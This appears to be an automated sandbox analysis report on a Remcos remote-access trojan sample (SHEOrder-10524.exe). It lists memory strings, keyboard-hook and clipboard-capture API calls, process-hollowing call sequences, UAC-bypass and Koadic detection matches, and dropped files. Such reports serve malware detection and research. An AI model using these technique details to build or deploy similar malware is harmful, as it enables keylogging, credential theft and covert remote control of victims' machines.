                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1885488700.0000000000902000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: lhgtogaW.pif, 00000005.00000003.1793746944.0000000000A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                  Source: lhgtogaW.pifString found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1884851023.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
                  Source: Wagotghl.PIF, 0000000B.00000002.1949920072.0000000013C5D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/downlo
                  Source: Wagotghl.PIF, 0000000B.00000002.1949920072.0000000013C40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=B24528E77689F9AC%21162&authkey=
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: lhgtogaW.pifString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49745 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000 | 4_2_0040A2B8
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\lhgtogaW.pif
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, | 4_2_0040B70E
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 4_2_004168C1
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 4_1_004168C1
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, | 5_2_0040987A
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, | 5_2_004098E2
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, | 4_2_0040B70E
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, | 4_2_0040A3E0
Source: Yara match | File source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match | File source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR
                  Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041C9E2 SystemParametersInfoW
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0041C9E2 SystemParametersInfoW

                  System Summary

                  Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\Public\Libraries\WagotghlO.bat, type: DROPPED | Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                  Source: initial sample | Static PE information: Filename: SHEOrder-10524.exe
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Process Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028DC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028DC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028DC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028D7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028D7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028D7F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028DC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028D7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028D7F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
